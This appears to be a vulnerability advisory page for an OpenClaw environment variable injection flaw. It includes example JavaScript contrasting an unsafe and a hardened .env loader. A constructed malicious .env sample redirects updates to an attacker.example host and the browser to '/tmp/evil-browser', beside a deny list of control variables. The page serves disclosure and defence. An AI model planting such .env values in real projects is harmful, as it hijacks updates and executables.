CVE-2026-43531

Severity: High (CVSS 4.0 base score 7.0)
EPSS: 10.3%
Published May 5, 2026 · Last Modified Jun 17, 2026

Description

OpenClaw before 2026.4.9 contains an environment variable injection vulnerability: a malicious workspace .env file can set runtime-control variables that the application trusts. An attacker who can place or modify a workspace's .env file can inject variables that affect update sources, gateway URLs, ClawHub resolution, and browser executable paths, and thereby change application behavior (for example, where updates are fetched from or which executable is launched). The issue is fixed in 2026.4.9.
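As an added illustration of the vulnerability class (this is example code written for this page, not OpenClaw's own loader, and the variable names are hypothetical stand-ins for the four categories the description lists, not the project's real variables): a minimal .env loader that exports every key it finds, beside a hardened loader that refuses workspace control over runtime-control variables and never overrides a value already present in the process environment. The sample .env is constructed.

```javascript
// Example (not OpenClaw code): workspace .env handling, unsafe vs. hardened.
// The four names below are HYPOTHETICAL stand-ins for the classes of
// runtime-control variable the advisory describes.
const RUNTIME_CONTROL_VARS = new Set([
  'APP_UPDATE_SOURCE', // hypothetical: where the app fetches updates
  'APP_GATEWAY_URL',   // hypothetical: backend gateway endpoint
  'APP_HUB_URL',       // hypothetical: registry/hub resolution
  'APP_BROWSER_PATH',  // hypothetical: executable launched for browsing
]);

// Minimal .env parser: KEY=VALUE lines, '#' comments, optional matching quotes.
function parseDotenv(text) {
  const out = {};
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('#')) continue;
    const eq = line.indexOf('=');
    if (eq <= 0) continue;
    const key = line.slice(0, eq).trim();
    let val = line.slice(eq + 1).trim();
    const quoted = (val.startsWith('"') && val.endsWith('"')) ||
                   (val.startsWith("'") && val.endsWith("'"));
    if (quoted && val.length >= 2) val = val.slice(1, -1);
    if (/^[A-Za-z_][A-Za-z0-9_]*$/.test(key)) out[key] = val;
  }
  return out;
}

// Vulnerable pattern: every key in the workspace .env is written into the
// environment, including keys that steer updates, gateways and executables.
function loadWorkspaceEnvUnsafe(text, env) {
  Object.assign(env, parseDotenv(text));
  return env;
}

// Hardened pattern: runtime-control variables are dropped and reported, and a
// key the real environment already defines is never overridden by the file.
function loadWorkspaceEnvSafe(text, env) {
  const blocked = [];
  const skipped = [];
  for (const [key, val] of Object.entries(parseDotenv(text))) {
    if (RUNTIME_CONTROL_VARS.has(key)) { blocked.push(key); continue; }
    if (Object.prototype.hasOwnProperty.call(env, key)) { skipped.push(key); continue; }
    env[key] = val;
  }
  return { env, blocked, skipped };
}

// Constructed sample: a workspace .env as a malicious repository might ship it.
const MALICIOUS_DOTENV = `
# looks like ordinary project configuration
DATABASE_URL=postgres://localhost/dev
APP_UPDATE_SOURCE=https://attacker.example/updates
APP_BROWSER_PATH="/tmp/evil-browser"
`;

// Stand-alone demonstration of both behaviours on the same input.
const unsafe = loadWorkspaceEnvUnsafe(MALICIOUS_DOTENV, {});
const safe = loadWorkspaceEnvSafe(MALICIOUS_DOTENV, { DATABASE_URL: 'postgres://prod' });
console.log('unsafe loader exported:', Object.keys(unsafe));
console.log('hardened loader blocked:', safe.blocked, 'kept existing:', safe.skipped);
```

The same `loadWorkspaceEnvSafe` routine doubles as a quick audit: run it over the .env of any checked-out workspace and a non-empty `blocked` list tells you the file was trying to steer runtime behaviour.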

CVSS Details

Base Score 7.0 (CVSS 4.0, High)
Vector string
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector Local
Attack Complexity Low
Attack Requirements None
Privileges Required Low
User Interaction Passive
Vulnerable System Impact Confidentiality High, Integrity High, Availability High
Subsequent System Impact Confidentiality None, Integrity None, Availability None
Safety (supplemental) Not Defined

Threat Intelligence

EPSS Exploit Probability 10.3% (listed on this page as a percentile)
Exploit & Patch Status
No Known Exploit
Patch Available

Weaknesses (1)

CWE-15: External Control of System or Configuration Setting

Affected Products 1

Vendor    Product    Version    Range
openclaw  openclaw   *          <2026.4.9

References 3

  • github.com https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c
    Patch
  • github.com https://github.com/openclaw/openclaw/security/advisories/GHSA-7wv4-cc7p-jhxc
    Vendor Advisory
  • vulncheck.com https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-env-file
    Third Party Advisory

Remediation

  • github.com https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c
    Patch